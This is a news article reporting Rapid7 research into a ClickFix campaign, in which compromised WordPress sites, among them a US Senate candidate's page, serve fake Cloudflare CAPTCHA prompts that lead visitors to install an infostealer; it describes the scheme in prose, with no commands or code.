Cyber baddies quietly compromised legitimate WordPress websites, including the campaign site of a US Senate candidate, turning them into launchpads for a global infostealer operation.
Researchers at Rapid7 say the scheme works by injecting malicious code into compromised sites, which then serve visitors a convincing fake Cloudflare CAPTCHA page. Instead of simply proving you’re not a robot, the prompt instructs users to copy and run a command on their machine – a step that ultimately triggers the download of credential-stealing malware.
The trick works because the attack starts on websites that otherwise look perfectly legitimate. Visitors think they’re just clearing yet another Cloudflare bot check – the sort that litters the modern web – when in fact they’re being talked through the first step of infecting their own machine.
The technique is part of the now well-worn ClickFix social engineering playbook, in which attackers persuade victims to execute commands themselves under the guise of fixing or verifying something on their systems.
The infected sites span a broad mix of organizations. According to Rapid7, compromised pages include regional media outlets, small business websites, and “in one case even a United States Senate candidate’s official webpage.” The company says it notified US authorities to investigate the issue and clean it up.
What’s more, the scope of the activity suggests this isn’t someone manually breaking into websites one by one.
“The large-scale execution of the compromise across completely unrelated WordPress instances suggests a high level of automation by the threat actor and is likely part of an organized long-term criminal effort,” said Rapid7 security researcher Milan Spinka.
Once a victim follows the instructions on the fake verification page, the attack chain can install an infostealer – malware designed to quietly scoop up useful data from the infected machine. That typically includes browser-stored credentials, authentication cookies, cryptocurrency wallet information, and other bits of digital loot.
Those stolen credentials rarely stay with the original attacker for long. Infostealer logs are routinely packaged up and sold on cybercrime marketplaces, where other criminals can buy ready-made access to email accounts, corporate systems, and online services without having to break in themselves.
The campaign has been active in its current form since at least December 2025, although some of the infrastructure behind it – including domain registrations used in the attack chain – dates back to July and August of last year.
So far, Rapid7 says it has identified more than 250 compromised websites across at least 12 countries, including Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, the UK, and the US.
Using compromised websites as the delivery mechanism gives the operators a useful layer of camouflage. Security tools and users alike are far less suspicious of well-known domains than newly registered malware sites, and the attackers get to piggyback on the reputation of whoever’s unlucky enough to have their website hacked. ®